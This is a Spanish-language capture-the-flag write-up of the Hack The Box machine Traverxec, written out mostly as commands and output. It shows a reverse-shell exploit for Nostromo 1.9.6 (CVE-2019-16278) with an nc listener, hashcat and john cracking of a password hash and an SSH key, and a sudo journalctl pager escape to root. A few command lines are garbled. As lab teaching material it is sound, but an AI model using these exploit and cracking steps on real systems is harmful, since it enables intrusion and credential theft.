Entrada

Traverxec

Publicado Actualizado
Hack The Box
Hack The Box
Por Pablo Martínez Rivas
6 min de lectura
Traverxec

Traverxec Linux · Easy - Adventure mode

🔭 Reconocimiento:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ nmap -p- -sSVC --min-rate 5000 10.129.11.160
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-16 22:48 +0100
Nmap scan report for 10.129.11.160
Host is up (0.046s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-title: TRAVERXEC
|_http-server-header: nostromo 1.9.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.04 seconds

traverexec_web

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ dirsearch -u http://traverexec.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/pmartinezr/htb/traverxec/reports/http_traverexec.htb/_26-02-17_00-24-22.txt

Target: http://traverexec.htb/

[00:24:22] Starting: 
[00:24:22] 301 -  316B  - /js  ->  http://traverexec.htb/js/                
[00:24:30] 501 -  312B  - /admin%20/                                        
[00:24:47] 301 -  316B  - /css  ->  http://traverexec.htb/css/              
[00:24:55] 301 -  316B  - /icons  ->  http://traverexec.htb/icons/          
[00:24:55] 301 -  316B  - /img  ->  http://traverexec.htb/img/              
[00:24:58] 200 -  598B  - /js/                                              
[00:24:59] 301 -  316B  - /lib  ->  http://traverexec.htb/lib/              
[00:24:59] 200 -    1KB - /lib/                                             
[00:25:00] 501 -  312B  - /login.wdm%20                                     
[00:25:05] 501 -  312B  - /New%20Folder                                     
[00:25:05] 501 -  312B  - /New%20folder%20(2)                               
[00:25:09] 501 -  312B  - /phpliteadmin%202.php                             
[00:25:15] 501 -  312B  - /Read%20Me.txt                                    
[00:25:15] 200 -  203B  - /Readme.txt                                       
[00:25:15] 400 -  304B  - /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[00:25:15] 400 -  304B  - /remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd

Dirsearch nos muestra un directorio /lib al visitarlo revela que se trata de un servidor web Nostromo 1.9.6

traverexec_nostromo

CVE: CVE-2019-16278

💣 Preparación:

https://github.com/cancela24/CVE-2019-16278-Nostromo-1.9.6-RCE

👽 Acciones:

1
2
3
4
5
6
7
8
9
10
11
12
13

┌──(CVE-2019-16278-Nostromo-1.9.6-RCE)(pmartinezr㉿kali)-[~/htb/traverxec/CVE-2019-16278-Nostromo-1.9.6-RCE]
└─$ python poc.py -t 10.129.11.160  -p 80  --attacker-ip 10.10.14.74 --attacker-port 4444
[!] Make sure to start a listener on your attacking machine with the command:
nc -lvnp 4444
[-] Sending payload to the server...: No response received. Retrying...
[+] Opening connection to 10.129.11.160 on port 80: Done
[*] Closed connection to 10.129.11.160 port 80
[*] Retrying (1/3)...
[+] Sending payload to the server...: Payload sent successfully. Shell received!
[+] Opening connection to 10.129.11.160 on port 80: Done
[*] Closed connection to 10.129.11.160 port 80
www-data@traverxec:/var/nostromo/conf$ cat .htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

En la configuración de Nostromo encontramos una password cifrada

1
2

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt --username
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me

Realmente esta password debe usarse en alguna parte de la aplicación web, pero en realidad no es necesaria para completar el reto.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ hashcat -m 500 hash /usr/share/wordlists/rockyou.txt --username
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]
servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html
# LOGS [OPTIONAL]
logpid                  logs/nhttpd.pid
# SETUID [RECOMMENDED]
user                    www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons                  /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs                /home
homedirs_public         public_www
www-data@traverxec:/var/nostromo/conf$ cd /home/david/public_www
www-data@traverxec:/home/david/public_www$ ls
index.html  protected-file-area

Mientras hashcat acababa de sacar la clave anterior investigué un poco sobre la aplicación y entendía que la aplicación puede publicar un directorio público por usuario si se desea tal que homedirs_public public_www es una página personal de los usuarios.

traverexec_david_public_wwww

Podemos alcanzar la web privada de David pero no nos lleva a ninguna parte.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

www-data@traverxec:/home/david/public_www$ cd protected-file-area/
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
backup-ssh-identity-files.tgz
cp backup-ssh-idenntity-files.tgz /tmp/ome/david/public_www/protected-file-area

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ ssh2john rsa_key > rsa_key.john

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ john rsa_key.john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (rsa_key)
1g 0:00:00:00 DONE (2026-02-16 23:43) 25.00g/s 4000p/s 4000c/s 4000C/s carolina..david
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ john --show
Password files required, but none specified

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ ssh2john rsa_key > rsa_key.john

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ john rsa_key.john --show
rsa_key:hunter
1 password hash cracked, 0 left

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ ssh -i rsa_key david@traverexec.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'rsa_key':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Mon Feb 16 17:46:39 2026 from 10.10.14.74
david@traverxec:~$ cat user.txt
8f60a366e25d92850*********

Al encontrar el fichero backup-ssh-identity-files.tgz opté por llevarlo a /tmp e iniciar la descompresión. En el se encuentran archivos de conexión SSH, de los cuales si aplicamos fuerza bruta a la clave privada, encontramos una clave muy débil hunter. Conseguirmos la primera bandera.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

david@traverxec:~/bin$ cat server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service 
-- Logs begin at Mon 2026-02-16 16:47:22 EST, end at Mon 2026-02-16 18:04:44 EST. --
Feb 16 16:47:25 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start:
Feb 16 16:47:25 traverxec nhttpd[800]: started
Feb 16 16:47:25 traverxec nhttpd[800]: max. file descriptors = 1040 (cur) / 1040 (max)
Feb 16 16:47:25 traverxec systemd[1]: Started nostromo nhttpd server.
Feb 16 17:04:36 traverxec nhttpd[969]: /../../../../bin/sh sent a bad cgi header
!/bin/bash
root@traverxec:/home/david/bin#

La escalada parecía más difícil de lo que es, puesto que no tenemos la password de David, sin embargo bastó con suponer que realemente tenemos habilitado con sudo el comando. Así que acortamos el comando tal que quede así /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service sin | /usr/bin/cat y luego simplemente antes de terminar la ejecución del comando journal insertamos el payload !/bin/bash y seremos root.

achivement

writeup, hackthebox
hackthebox traverexec
Esta entrada está licenciada bajo CC BY 4.0 por el autor.